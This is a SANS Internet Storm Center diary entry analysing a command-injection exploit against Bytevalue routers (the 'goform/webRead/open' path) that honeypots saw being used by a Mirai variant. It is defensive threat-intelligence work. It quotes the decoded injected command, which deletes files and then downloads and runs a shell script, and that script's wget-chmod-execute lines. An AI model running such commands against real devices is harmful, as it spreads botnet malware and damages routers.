Exploit against Unnamed “Bytevalue” router vulnerability included in Mirai Bot, (Mon, Feb 12th)

Category :

SANS Full Feed

Posted On :

Today, I noticed the following URL showing up in our “First Seen” list:


Initially, our sensors detected requests for just “goform/webRead/open”. 


Bytevalue Login page from bytevalue.com

URLs containing “goform” are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a “/goform/” URL. The most popular URL is usually “goform/set_LimitClient_cfg”, associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.


So far, I have not been able to identify a specific CVE number for vulnerabilities related to  “goform/webRead/open”. However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company “BYTEVALUE.” I could not find a patch for the vulnerability.

The exploit attempt In the URL above follows the standard command injection pattern. URL decode leads to:

rm -rf *; cd /tmp; wget; chmod 777 bruh.sh; ./bruh.sh

With “bruh.sh” being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]

The binary is simply UPX-packed. The binary contains strings pointing to other router exploits and paths in “/home/landley/”, which may indicate the system the binary was compiled on.

Virustotal did not have a sample yet when I uploaded mine [2]. However, the sample is well recognized as a “Mirai” variant that appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.